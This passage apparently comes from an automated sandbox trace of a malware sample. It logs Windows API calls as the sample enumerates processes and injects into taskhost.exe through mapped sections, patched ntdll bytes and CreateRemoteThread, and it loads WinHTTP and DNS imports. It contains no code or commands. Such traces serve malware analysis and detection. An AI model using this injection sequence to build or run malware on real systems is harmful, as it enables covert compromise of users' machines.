Source=0x2937e0, Length=0x363 | out: Destination=0x60023) [0165.394] NtUnmapViewOfSection (ProcessHandle=0xffffffffffffffff, BaseAddress=0x60023) returned 0x0 [0165.395] CreateMutexA (lpMutexAttributes=0x0, bInitialOwner=0, lpName="opera_shared_counter64") returned 0xe4 [0165.395] GetLastError () returned 0x0 [0165.395] GetModuleHandleA (lpModuleName="ntdll") returned 0x76f50000 [0165.395] GetProcAddress (hModule=0x76f50000, lpProcName="atan") returned 0x76fd9604 [0165.395] ReadProcessMemory (in: hProcess=0xd8, lpBaseAddress=0x76fd9604, lpBuffer=0x10fb00, nSize=0xe, lpNumberOfBytesRead=0x10fb68 | out: lpBuffer=0x10fb00*, lpNumberOfBytesRead=0x10fb68*=0xe) returned 1 [0165.396] WriteProcessMemory (in: hProcess=0xd8, lpBaseAddress=0x76fd9604, lpBuffer=0x10faf0*, nSize=0xe, lpNumberOfBytesWritten=0x10fb68 | out: lpBuffer=0x10faf0*, lpNumberOfBytesWritten=0x10fb68*=0xe) returned 1 [0165.397] CreateRemoteThread (in: hProcess=0xd8, lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x76fd9604, lpParameter=0x0, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0xe8 [0165.398] CloseHandle (hObject=0xe8) returned 1 [0165.398] Sleep (dwMilliseconds=0x1f4) [0165.979] WriteProcessMemory (in: hProcess=0xd8, lpBaseAddress=0x76fd9604, lpBuffer=0x10fb00*, nSize=0xe, lpNumberOfBytesWritten=0x10fb68 | out: lpBuffer=0x10fb00*, lpNumberOfBytesWritten=0x10fb68*=0xe) returned 1 [0165.981] CloseHandle (hObject=0xe4) returned 1 [0165.981] CloseHandle (hObject=0xe0) returned 1 [0165.981] CloseHandle (hObject=0xdc) returned 1 [0165.981] CloseHandle (hObject=0xd8) returned 1 [0165.981] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x480, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0165.982] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x480) returned 0x0 [0165.982] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0165.982] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x4ac) returned 0xd8 [0165.982] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0165.983] CloseHandle (hObject=0xd8) returned 1 [0165.983] lstrcmpiA (lpString1="taskhost.exe", lpString2="explorer.exe") returned 1 [0165.983] lstrcmpiA (lpString1="taskhost.exe", lpString2="svchost.exe") returned 1 [0165.983] lstrcmpiA (lpString1="taskhost.exe", lpString2="dllhost.exe") returned 1 [0165.983] VirtualQuery (in: lpAddress=0x293b50, lpBuffer=0x10fb10, dwLength=0x30 | out: lpBuffer=0x10fb10*(BaseAddress=0x293000, AllocationBase=0x260000, AllocationProtect=0x4, __alignment1=0xfffff8a0, RegionSize=0xf000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0165.983] lstrcmpiA (lpString1="taskhost.exe", lpString2="microsoftedgecp.exe") returned 1 [0165.983] VirtualQuery (in: lpAddress=0x2937e0, lpBuffer=0x10fa60, dwLength=0x30 | out: lpBuffer=0x10fa60*(BaseAddress=0x293000, AllocationBase=0x260000, AllocationProtect=0x4, __alignment1=0xfffff8a0, RegionSize=0xf000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0165.983] OpenProcess (dwDesiredAccess=0x1fffff, bInheritHandle=0, dwProcessId=0x4ac) returned 0xd8 [0165.983] VirtualQuery (in: lpAddress=0x293b50, lpBuffer=0x10fa60, dwLength=0x30 | out: lpBuffer=0x10fa60*(BaseAddress=0x293000, AllocationBase=0x260000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0xf000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0165.983] NtCreateSection (in: SectionHandle=0x10fae0, DesiredAccess=0xf001f, ObjectAttributes=0x0, MaximumSize=0x10fa78, SectionPageProtection=0x40, AllocationAttributes=0x8000000, FileHandle=0x0 | out: SectionHandle=0x10fae0*=0xdc) returned 0x0 [0165.983] NtMapViewOfSection (in: SectionHandle=0xdc, ProcessHandle=0xd8, BaseAddress=0x10fa70*=0x0, ZeroBits=0x0, CommitSize=0x0, SectionOffset=0x0, ViewSize=0x10fa80*=0x0, InheritDisposition=0x1, AllocationType=0x0, AccessProtection=0x40 | out: BaseAddress=0x10fa70*=0x2090000, SectionOffset=0x0, ViewSize=0x10fa80*=0xb000) returned 0x0 [0165.999] NtCreateSection (in: SectionHandle=0x10fb58, DesiredAccess=0xf001f, ObjectAttributes=0x0, MaximumSize=0x10fa78, SectionPageProtection=0x40, AllocationAttributes=0x8000000, FileHandle=0x0 | out: SectionHandle=0x10fb58*=0xe0) returned 0x0 [0165.999] NtMapViewOfSection (in: SectionHandle=0xe0, ProcessHandle=0xd8, BaseAddress=0x10fa70*=0x0, ZeroBits=0x0, CommitSize=0x0, SectionOffset=0x0, ViewSize=0x10fa80*=0x0, InheritDisposition=0x1, AllocationType=0x0, AccessProtection=0x40 | out: BaseAddress=0x10fa70*=0x20a0000, SectionOffset=0x0, ViewSize=0x10fa80*=0x1000) returned 0x0 [0165.999] NtMapViewOfSection (in: SectionHandle=0xdc, ProcessHandle=0xffffffffffffffff, BaseAddress=0x10fa70*=0x0, ZeroBits=0x0, CommitSize=0x0, SectionOffset=0x0, ViewSize=0x10fa80*=0x0, InheritDisposition=0x1, AllocationType=0x0, AccessProtection=0x40 | out: BaseAddress=0x10fa70*=0x60000, SectionOffset=0x0, ViewSize=0x10fa80*=0xb000) returned 0x0 [0166.000] RtlMoveMemory (in: Destination=0x61000, Source=0x293f50, Length=0x0 | out: Destination=0x61000) [0166.000] RtlMoveMemory (in: Destination=0x67000, Source=0x293f50, Length=0x2200 | out: Destination=0x67000) [0166.000] RtlMoveMemory (in: Destination=0x6a000, Source=0x296150, Length=0x400 | out: Destination=0x6a000) [0166.000] LoadLibraryA (lpLibFileName="ADVAPI32.dll") returned 0x7fefdbf0000 [0166.000] GetProcAddress (hModule=0x7fefdbf0000, lpProcName="CryptHashData") returned 0x7fefdbfdac0 [0166.000] LoadLibraryA (lpLibFileName="CRYPT32.dll") returned 0x7fefd080000 [0166.001] GetProcAddress (hModule=0x7fefd080000, lpProcName="CryptStringToBinaryA") returned 0x7fefd0ce59c [0166.001] LoadLibraryA (lpLibFileName="DNSAPI.dll") returned 0x7fefc5b0000 [0166.001] GetProcAddress (hModule=0x7fefc5b0000, lpProcName="DnsFree") returned 0x7fefc5b1e74 [0166.001] LoadLibraryA (lpLibFileName="KERNEL32.DLL") returned 0x76e30000 [0166.001] GetProcAddress (hModule=0x76e30000, lpProcName="LoadLibraryA") returned 0x76e47070 [0166.001] GetProcAddress (hModule=0x76e30000, lpProcName="GetProcAddress") returned 0x76e53690 [0166.001] GetProcAddress (hModule=0x76e30000, lpProcName="VirtualProtect") returned 0x76e32ef0 [0166.001] LoadLibraryA (lpLibFileName="ntdll.dll") returned 0x76f50000 [0166.001] GetProcAddress (hModule=0x76f50000, lpProcName="NtCreateSection") returned 0x76fa17b0 [0166.001] LoadLibraryA (lpLibFileName="USER32.dll") returned 0x76d30000 [0166.002] GetProcAddress (hModule=0x76d30000, lpProcName="wsprintfW") returned 0x76d5099c [0166.002] LoadLibraryA (lpLibFileName="WINHTTP.dll") returned 0x7fef7150000 [0166.002] GetProcAddress (hModule=0x7fef7150000, lpProcName="WinHttpOpen") returned 0x7fef7153428 [0166.002] LoadLibraryA (lpLibFileName="WS2_32.dll") returned 0x7fefe260000 [0166.002] GetProcAddress (hModule=0x7fefe260000, lpProcName=0xf) returned 0x7fefe261250 [0166.002] NtUnmapViewOfSection (ProcessHandle=0xffffffffffffffff, BaseAddress=0x60000) returned 0x0 [0166.003] NtMapViewOfSection (in: SectionHandle=0xe0, ProcessHandle=0xffffffffffffffff, BaseAddress=0x10fa70*=0x0, ZeroBits=0x0, CommitSize=0x0, SectionOffset=0x0, ViewSize=0x10fa80*=0x0, InheritDisposition=0x1, AllocationType=0x0, AccessProtection=0x40 | out: BaseAddress=0x10fa70*=0x60000, SectionOffset=0x0, ViewSize=0x10fa80*=0x1000) returned 0x0 [0166.003] RtlMoveMemory (in: Destination=0x60000, Source=0x544b8, Length=0x23 | out: Destination=0x60000) [0166.003] RtlMoveMemory (in: Destination=0x60023, Source=0x2937e0, Length=0x363 | out: Destination=0x60023) [0166.003] NtUnmapViewOfSection (ProcessHandle=0xffffffffffffffff, BaseAddress=0x60023) returned 0x0 [0166.004] CreateMutexA (lpMutexAttributes=0x0, bInitialOwner=0, lpName="opera_shared_counter64") returned 0xe4 [0166.004] GetLastError () returned 0x0 [0166.004] GetModuleHandleA (lpModuleName="ntdll") returned 0x76f50000 [0166.004] GetProcAddress (hModule=0x76f50000, lpProcName="atan") returned 0x76fd9604 [0166.004] ReadProcessMemory (in: hProcess=0xd8, lpBaseAddress=0x76fd9604, lpBuffer=0x10fb00, nSize=0xe, lpNumberOfBytesRead=0x10fb68 | out: lpBuffer=0x10fb00*, lpNumberOfBytesRead=0x10fb68*=0xe) returned 1 [0166.005] WriteProcessMemory (in: hProcess=0xd8, lpBaseAddress=0x76fd9604, lpBuffer=0x10faf0*, nSize=0xe, lpNumberOfBytesWritten=0x10fb68 | out: lpBuffer=0x10faf0*, lpNumberOfBytesWritten=0x10fb68*=0xe) returned 1 [0166.006] CreateRemoteThread (in: hProcess=0xd8, lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x76fd9604, lpParameter=0x0, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0xe8 [0166.007] CloseHandle (hObject=0xe8) returned 1 [0166.007] Sleep (dwMilliseconds=0x1f4) [0166.625] WriteProcessMemory (in: hProcess=0xd8, lpBaseAddress=0x76fd9604, lpBuffer=0x10fb00*, nSize=0xe, lpNumberOfBytesWritten=0x10fb68 | out: lpBuffer=0x10fb00*, lpNumberOfBytesWritten=0x10fb68*=0xe) returned 1 [0166.626] CloseHandle (hObject=0xe4) returned 1 [0166.626] CloseHandle (hObject=0xe0) returned 1 [0166.627] CloseHandle (hObject=0xdc) returned 1 [0166.627] CloseHandle (hObject=0xd8) returned 1 [0166.627] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x14, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0166.627] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x4d4) returned 0x0 [0166.627] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x50c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x36c, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1 [0166.628] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x50c) returned 0x0 [0166.628] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xc4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="abortion-serbia-effect.exe")) returned 1 [0166.629] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc4) returned 0xd8 [0166.629] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0166.629] CloseHandle (hObject=0xd8) returned 1 [0166.629] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x62c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="beverages-tapes-dod.exe")) returned 1 [0166.630] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x62c) returned 0xd8 [0166.630] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0166.630] CloseHandle (hObject=0xd8) returned 1 [0166.630] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x5a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="receptor paintings.exe")) returned 1 [0166.630] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x5a4) returned 0xd8 [0166.630] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0166.630] CloseHandle (hObject=0xd8) returned 1 [0166.631] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x780, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="definitely.exe")) returned 1 [0166.631] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x780) returned 0xd8 [0166.631] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0166.631] CloseHandle (hObject=0xd8) returned 1 [0166.631] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x240, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="knewdifferenceskaren.exe")) returned 1 [0166.632] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x240) returned 0xd8 [0166.632] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0166.632] CloseHandle (hObject=0xd8) returned 1 [0166.632] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x2c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="whenever.exe")) returned 1 [0166.633] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x2c8) returned 0xd8 [0166.633] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0166.633] CloseHandle (hObject=0xd8) returned 1 [0166.633] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x310, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="potentially.exe")) returned 1 [0166.634] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x310) returned 0xd8 [0166.634] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0166.634] CloseHandle (hObject=0xd8) returned 1 [0166.634] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x314, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="seeker.exe")) returned 1 [0166.634] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x314) returned 0xd8 [0166.635] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0166.635] CloseHandle (hObject=0xd8) returned 1 [0166.635] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x320, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="objects-virus-israeli.exe")) returned 1 [0166.635] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x320) returned 0xd8 [0166.635] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0166.635] CloseHandle (hObject=0xd8) returned 1 [0166.635] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="birth bean.exe")) returned 1 [0166.636] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x7a4) returned 0xd8 [0166.636] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0166.636] CloseHandle (hObject=0xd8) returned 1 [0166.636] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x688, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="ruby.exe")) returned 1 [0166.637] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x688) returned 0xd8 [0166.637] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0166.637] CloseHandle (hObject=0xd8) returned 1 [0166.637] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7f0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="zoodiffer.exe")) returned 1 [0166.638] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x7f0) returned 0xd8 [0166.638] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0166.638] CloseHandle (hObject=0xd8) returned 1 [0166.638] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="smith.exe")) returned 1 [0166.638] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x7d4) returned 0xd8 [0166.638] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0166.638] CloseHandle (hObject=0xd8) returned 1 [0166.639] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x58c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="spicedespite.exe")) returned 1 [0166.639] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x58c) returned 0xd8 [0166.639] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0166.639] CloseHandle (hObject=0xd8) returned 1 [0166.639] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x644, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="wooden.exe")) returned 1 [0166.640] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x644) returned 0xd8 [0166.640] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0166.640] CloseHandle (hObject=0xd8) returned 1 [0166.640] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="dallasr.exe")) returned 1 [0166.641] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x7e0) returned 0xd8 [0166.641] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0166.641] CloseHandle (hObject=0xd8) returned 1 [0166.641] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x5d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="bags shakira tourism.exe")) returned 1 [0166.641] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x5d8) returned 0xd8 [0166.642] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0166.642] CloseHandle (hObject=0xd8) returned 1 [0166.642] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="constadvertisement.exe")) returned 1 [0166.642] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x7d8) returned 0xd8 [0166.642] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0166.642] CloseHandle (hObject=0xd8) returned 1 [0166.642] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x2ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="sensors-democrat.exe")) returned 1 [0166.643] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x2ac) returned 0xd8 [0166.643] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0166.643] CloseHandle (hObject=0xd8) returned 1 [0166.643] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="doctrine alcohol.exe")) returned 1 [0166.644] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x7fc) returned 0xd8 [0166.644] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0166.644] CloseHandle (hObject=0xd8) returned 1 [0166.644] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x53c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="population openings.exe")) returned 1 [0166.645] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x53c) returned 0xd8 [0166.645] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0166.645] CloseHandle (hObject=0xd8) returned 1 [0166.645] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x6b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x254, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0166.645] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6b4) returned 0x0 [0166.645] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xa38, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0166.646] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xa38) returned 0x0 [0166.646] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xa58, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1 [0166.647] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xa58) returned 0x0 [0166.647] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xa70, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x10, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0166.647] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xa70) returned 0x0 [0166.647] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xb00, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0166.648] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xb00) returned 0x0 [0166.648] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xb84, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0166.649] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xb84) returned 0x0 [0166.649] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xbdc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x20, th32ParentProcessID=0x1b0, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0166.650] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xbdc) returned 0xd8 [0166.650] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0166.650] CloseHandle (hObject=0xd8) returned 1 [0166.650] lstrcmpiA (lpString1="explorer.exe", lpString2="explorer.exe") returned 0 [0166.650] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x790, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x36c, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1 [0166.650] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x790) returned 0xd8 [0166.650] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0166.650] CloseHandle (hObject=0xd8) returned 1 [0166.650] lstrcmpiA (lpString1="taskeng.exe", lpString2="explorer.exe") returned 1 [0166.651] lstrcmpiA (lpString1="taskeng.exe", lpString2="svchost.exe") returned 1 [0166.651] lstrcmpiA 